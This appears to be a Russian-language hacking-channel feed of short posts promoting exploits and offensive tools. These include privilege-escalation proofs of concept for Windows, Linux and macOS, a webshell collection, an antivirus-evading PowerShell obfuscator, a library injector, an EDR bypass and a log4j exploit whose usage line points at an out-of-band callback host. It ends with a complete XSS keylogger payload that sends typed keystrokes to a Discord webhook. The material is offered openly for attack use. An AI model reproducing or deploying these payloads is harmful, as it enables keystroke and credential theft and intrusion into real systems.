DirCreate2System
Получаем NT AUTHORITY\\SYSTEM
*
Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC

#windows #escpriv #POC #system

Privilege Escalation Vulnerabilities (UNIX Insecure File Handling)
*
1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging
2. UNIX Symlink Following and Race Condition in Hardware Reporting
3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol
4. UNIX Symlink Following in Log File Creation of saposcol
5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol



#linux #privesc #sec

CVE-2022-45451
Acronis POC
download

Большая коллекция WEBSHELLS
На asp, aspx, php, jsp, pl, py, etc
download

#webshell

Super Xray
Web Vulnerability Scanner
download

#web #vuln #scanner

CVE-2022-28672
Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))

Бэкдоры в FreePBX
PHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))
Пятничное расследование читать

#freepbx #backdoor

Dirty Vanity
новая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.
Слайды тут
POC тут

#windows #bypass #edr

MacDirtyCowDem
Получаем root в macOS 13.0.1 через CVE-2022-46689
exploit



#root #macos #exploit

powershell-obfuscation
Обфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)
download

linux injector

Инжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)
usage:

linux_injector <pid> <module>

Да да, все так просто, иди уже.

download

Только ВАЖНЫЕ вопросы !

#hackers #xss

Атаки на web-приложения на JAVA
Это обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.
download
*
Bonus track
Jar Analyzer
GUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода.
download

#java #security #web #hack

Cloudmare
Палим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.
Но таки да - работает только если криво настроен DNS.
download

Php Remote file Inclusion and RCE in flatpressblog/flatpress
Proof of Concept

#php #vuln

log4j
ДА, еще один, но попроще
usage:
python3 hik.py https://localhost:443 xxx.oastify.com:80

downLoad

Оценка уязвимостей с помощью Nmap ?
Вам нужен Vultriever !
*
Из коробки Vultriever умеет:

Server IP address
Network port number
Network port status
Protocol used by the network port
Network service operating on the network port and its version
Vulnerability CVE-identifier
Vulnerability rating
URL-link to the denoscription of the vulnerability on the platform Vulners.com

Заказывайте прямо сейчас с уникальной финкой лгбт



Download

CVE-2022-2602 - exploit
Опубликован PoC Kernel Privilege Escalation Linux
*
О чем это, прочитать тут_1 и тут_2
*
POC (точнее два) - забрать
Exploit - забрать

#linux #kernel #exploits

Охота на C2 C&C сервера
Понимание работы и обнаружение фреймворков C2 (C&C)
*
1. Understanding & Detecting C2 Frameworks — TrevorC2
2. Understanding & Detecting C2 Frameworks — Ares
3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)
4. Understanding & Detecting C2 Frameworks — BabyShark
*
BonusTrack:
Download BabyShark

#C2 #hackers #botnets

Linux Kernel RCE (ksmbd)
*
CVSS SCORE: 10 из 10
*
Детали тут
Патч прилетел в ядро только в ветке 5.15.61


#10из10

XSS Payload - Discord Keylogger
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>

#discord #xss